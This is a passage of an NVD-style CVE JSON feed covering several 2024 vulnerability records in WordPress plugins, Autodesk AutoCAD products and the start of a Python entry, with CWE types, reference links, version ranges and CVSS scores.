"ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.3.4/modules/widgets/tp_flip_box.php#L2323", "name" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.3.4/modules/widgets/tp_flip_box.php#L2323", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.3.4/modules/widgets/tp_flip_box.php#L2323", "name" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.3.4/modules/widgets/tp_flip_box.php#L2323", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.3.4/modules/widgets/tp_info_box.php#L2928", "name" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.3.4/modules/widgets/tp_info_box.php#L2928", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.3.4/modules/widgets/tp_info_box.php#L2928", "name" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.3.4/modules/widgets/tp_info_box.php#L2928", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.3.4/modules/widgets/tp_pricing_table.php#L2942", "name" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.3.4/modules/widgets/tp_pricing_table.php#L2942", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.3.4/modules/widgets/tp_pricing_table.php#L2942", "name" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.3.4/modules/widgets/tp_pricing_table.php#L2942", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.5.0/modules/widgets/tp_flip_box.php#L2388", "name" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.5.0/modules/widgets/tp_flip_box.php#L2388", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.5.0/modules/widgets/tp_flip_box.php#L2388", "name" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.5.0/modules/widgets/tp_flip_box.php#L2388", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.5.0/modules/widgets/tp_info_box.php#L2997", "name" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.5.0/modules/widgets/tp_info_box.php#L2997", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.5.0/modules/widgets/tp_info_box.php#L2997", "name" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.5.0/modules/widgets/tp_info_box.php#L2997", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.5.0/modules/widgets/tp_pricing_table.php#L2960", "name" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.5.0/modules/widgets/tp_pricing_table.php#L2960", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.5.0/modules/widgets/tp_pricing_table.php#L2960", "name" : "https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.5.0/modules/widgets/tp_pricing_table.php#L2960", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a412e682-869a-46ba-a2d0-d84ed542adc9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a412e682-869a-46ba-a2d0-d84ed542adc9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a412e682-869a-46ba-a2d0-d84ed542adc9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a412e682-869a-46ba-a2d0-d84ed542adc9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's element attributes in all versions up to, and including, 5.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. CVE-2024-34373 is likely a duplicate of this issue." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:free:wordpress:*:*", "versionEndExcluding" : "5.5.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:pro:wordpress:*:*", "versionEndExcluding" : "5.5.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-05-14T14:40Z", "lastModifiedDate" : "2025-01-27T18:41Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0446", "ASSIGNER" : "psirt@autodesk.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002", "name" : "https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002", "name" : "https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004", "name" : "https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004", "name" : "https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0009", "name" : "https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0009", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0009", "name" : "https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0009", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A maliciously crafted STP, CATPART or MODEL file, when parsed in ASMKERN228A.dll and ASMdatax229A.dll through Autodesk AutoCAD, may force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2021", "versionEndExcluding" : "2021.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2022", "versionEndExcluding" : "2022.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2023", "versionEndExcluding" : "2023.1.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2024", "versionEndExcluding" : "2024.1.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2025", "versionEndExcluding" : "2025.0.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_architecture:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2021", "versionEndExcluding" : "2021.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_architecture:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2022", "versionEndExcluding" : "2022.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_architecture:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2023", "versionEndExcluding" : "2023.1.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_architecture:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2024", "versionEndExcluding" : "2024.1.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_architecture:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2025", "versionEndExcluding" : "2025.0.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_electrical:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2021", "versionEndExcluding" : "2021.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_electrical:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2022", "versionEndExcluding" : "2022.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_electrical:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2023", "versionEndExcluding" : "2023.1.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_electrical:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2024", "versionEndExcluding" : "2024.1.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_electrical:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2025", "versionEndExcluding" : "2025.0.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_mechanical:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2021", "versionEndExcluding" : "2021.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_mechanical:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2022", "versionEndExcluding" : "2022.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_mechanical:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2023", "versionEndExcluding" : "2023.1.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_mechanical:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2024", "versionEndExcluding" : "2024.1.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_mechanical:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2025", "versionEndExcluding" : "2025.0.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_mep:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2021", "versionEndExcluding" : "2021.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_mep:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2022", "versionEndExcluding" : "2022.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_mep:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2023", "versionEndExcluding" : "2023.1.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_mep:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2024", "versionEndExcluding" : "2024.1.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_mep:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2025", "versionEndExcluding" : "2025.0.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_plant_3d:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2021", "versionEndExcluding" : "2021.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_plant_3d:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2022", "versionEndExcluding" : "2022.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_plant_3d:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2023", "versionEndExcluding" : "2023.1.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_plant_3d:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2024", "versionEndExcluding" : "2024.1.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_plant_3d:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2025", "versionEndExcluding" : "2025.0.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:civil_3d:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2021", "versionEndExcluding" : "2021.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:civil_3d:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2022", "versionEndExcluding" : "2022.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:civil_3d:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2023", "versionEndExcluding" : "2023.1.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:civil_3d:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2024", "versionEndExcluding" : "2024.1.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:civil_3d:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2025", "versionEndExcluding" : "2025.0.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:advance_steel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2021", "versionEndExcluding" : "2021.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:advance_steel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2022", "versionEndExcluding" : "2022.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:advance_steel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2023", "versionEndExcluding" : "2023.1.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:advance_steel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2024", "versionEndExcluding" : "2024.1.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:advance_steel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2025", "versionEndExcluding" : "2025.0.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_map_3d:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2021", "versionEndExcluding" : "2021.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_map_3d:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2022", "versionEndExcluding" : "2022.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_map_3d:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2023", "versionEndExcluding" : "2023.1.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_map_3d:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2024", "versionEndExcluding" : "2024.1.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autodesk:autocad_map_3d:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2025", "versionEndExcluding" : "2025.0.1", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-22T00:15Z", "lastModifiedDate" : "2025-04-11T15:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0447", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/artibot/trunk/artibot.php#L60", "name" : "https://plugins.trac.wordpress.org/browser/artibot/trunk/artibot.php#L60", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/artibot/trunk/artibot.php#L60", "name" : "https://plugins.trac.wordpress.org/browser/artibot/trunk/artibot.php#L60", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/848f36de-c62a-45ee-b259-46dab73e4439?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/848f36de-c62a-45ee-b259-46dab73e4439?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/848f36de-c62a-45ee-b259-46dab73e4439?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/848f36de-c62a-45ee-b259-46dab73e4439?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The ArtiBot Free Chat Bot for WordPress WebSites plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the artibot_update function in all versions up to, and including, 1.1.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to update plugin settings." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:artibot:artibot:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.1.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.0, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 1.4 } }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-03-11T16:38Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0448", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/services/content.php#L20", "name" : "https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/services/content.php#L20", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/services/content.php#L20", "name" : "https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/services/content.php#L20", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/team-members/style1.php#L17", "name" : "https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/team-members/style1.php#L17", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/team-members/style1.php#L17", "name" : "https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/team-members/style1.php#L17", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3026261%40addons-for-elementor%2Ftrunk&old=3022220%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3026261%40addons-for-elementor%2Ftrunk&old=3022220%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3026261%40addons-for-elementor%2Ftrunk&old=3022220%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3026261%40addons-for-elementor%2Ftrunk&old=3022220%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/058d1aa0-2ef6-49a4-b978-43a91c8e55f3?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/058d1aa0-2ef6-49a4-b978-43a91c8e55f3?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/058d1aa0-2ef6-49a4-b978-43a91c8e55f3?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/058d1aa0-2ef6-49a4-b978-43a91c8e55f3?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget URL parameters in all versions up to, and including, 8.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:livemesh:elementor_addons:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "8.3.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0449", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/artibot/trunk/artibot.php#L52", "name" : "https://plugins.trac.wordpress.org/browser/artibot/trunk/artibot.php#L52", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/artibot/trunk/artibot.php#L52", "name" : "https://plugins.trac.wordpress.org/browser/artibot/trunk/artibot.php#L52", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/450d0748-93d6-448a-97a2-06fc2f8065b3?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/450d0748-93d6-448a-97a2-06fc2f8065b3?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/450d0748-93d6-448a-97a2-06fc2f8065b3?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/450d0748-93d6-448a-97a2-06fc2f8065b3?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The ArtiBot Free Chat Bot for WordPress WebSites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:artibot:artibot:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.1.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-03-11T16:37Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0450", "ASSIGNER" : "cna@python.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "http://www.openwall.com/lists/oss-security/2024/03/20/5", "name" : "http://www.openwall.com/lists/oss-security/2024/03/20/5", "refsource" : "", "tags" : [ ] }, { "url" : "http://www.openwall.com/lists/oss-security/2024/03/20/5", "name" : "http://www.openwall.com/lists/oss-security/2024/03/20/5", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/30fe5d853b56138dbec62432d370a1f99409fc85", "name" : "https://github.com/python/cpython/commit/30fe5d853b56138dbec62432d370a1f99409fc85", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/30fe5d853b56138dbec62432d370a1f99409fc85", "name" : "https://github.com/python/cpython/commit/30fe5d853b56138dbec62432d370a1f99409fc85", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/66363b9a7b9fe7c99eba3a185b74c5fdbf842eba", "name" : "https://github.com/python/cpython/commit/66363b9a7b9fe7c99eba3a185b74c5fdbf842eba", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/66363b9a7b9fe7c99eba3a185b74c5fdbf842eba", "name" : "https://github.com/python/cpython/commit/66363b9a7b9fe7c99eba3a185b74c5fdbf842eba", 